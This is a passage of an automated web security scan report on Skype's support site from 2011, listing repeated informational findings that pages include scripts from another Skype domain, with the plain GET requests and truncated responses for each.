GET /en-us/category/SM_PAYMENTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50792


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.469. https://support.skype.com/en-us/category/SM_REPORTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SM_REPORTS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SM_REPORTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47634


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.470. https://support.skype.com/en-us/category/SUBSCRIPTIONS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SUBSCRIPTIONS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SUBSCRIPTIONS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:30 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52901


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.471. https://support.skype.com/en-us/category/TS_ACCOUNT/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/TS_ACCOUNT/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/TS_ACCOUNT/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53126


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.472. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/TS_INSTALL_UPGRADE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/TS_INSTALL_UPGRADE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:07 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51439


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.473. https://support.skype.com/en-us/category/UKASH/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/UKASH/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/UKASH/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:27 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48688


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.474. https://support.skype.com/en-us/category/VIDEO/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VIDEO/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/VIDEO/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:08 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48467


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.475. https://support.skype.com/en-us/category/VID_CALLING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VID_CALLING/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/VID_CALLING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:26 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51077


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.476. https://support.skype.com/en-us/category/VOICEMAIL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VOICEMAIL/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/VOICEMAIL/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:19 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50796


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.477. https://support.skype.com/en-us/category/VOUCHERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/VOUCHERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/VOUCHERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:23 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49832


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.478. https://support.skype.com/en-us/category/WINDOWS_MOBILE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/WINDOWS_MOBILE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/WINDOWS_MOBILE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:02 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 49007


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.479. https://support.skype.com/en-us/category/YANDEX_MONEY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/YANDEX_MONEY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/YANDEX_MONEY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:25 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 47756


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.480. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA10414/How-do-subscriptions-work

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA10414/How-do-subscriptions-work HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 58632


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How do subscriptions work?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, t
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.481. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA10416/Why-isn-t-my-subscription-working

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA10416/Why-isn-t-my-subscription-working HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:00 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 58129


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Why isn&#039;t my subscription working?</title>
   <meta name="description" content="Help using Skype - FAQs, u
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.482. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA109/I-ve-forgotten-my-password

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA109/I-ve-forgotten-my-password HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:24 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55107


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: I...ve forgotten my password...</title>
   <meta name="description" content="Help using Skype - FAQs, user guid
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.483. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:55 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54830


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Can I make video calls on Facebook?</title>
   <meta name="description" content="Help using Skype - FAQs, user
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.484. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA140/How-can-I-change-my-privacy-settings

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA140/How-can-I-change-my-privacy-settings HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:51 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54416


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How can I change my privacy settings?</title>
   <meta name="description" content="Help using Skype - FAQs, use
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.485. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA331/What-is-an-Online-Number

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA331/What-is-an-Online-Number HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52452


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: What is an Online Number?</title>
   <meta name="description" content="Help using Skype - FAQs, user guides, tr
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.486. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA351/How-can-I-pay-for-Skype-products

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA351/How-can-I-pay-for-Skype-products HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:58 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52523


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: How can I pay for Skype products?</title>
   <meta name="description" content="Help using Skype - FAQs, user gu
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.487. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53765


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype: Why can&#039;t I sign in to Skype?</title>
   <meta name="description" content="Help using Skype - FAQs, user g
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.488. https://support.skype.com/en-us/glossary  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/glossary

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/glossary HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:34 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 67965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="e
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.489. https://support.skype.com/en-us/search.form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search.form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/search.form HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:36:39 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en
...[SNIP]...
</script>
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.490. https://support.skype.com/en-us/search_first/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/search_first/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/search_first/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43091


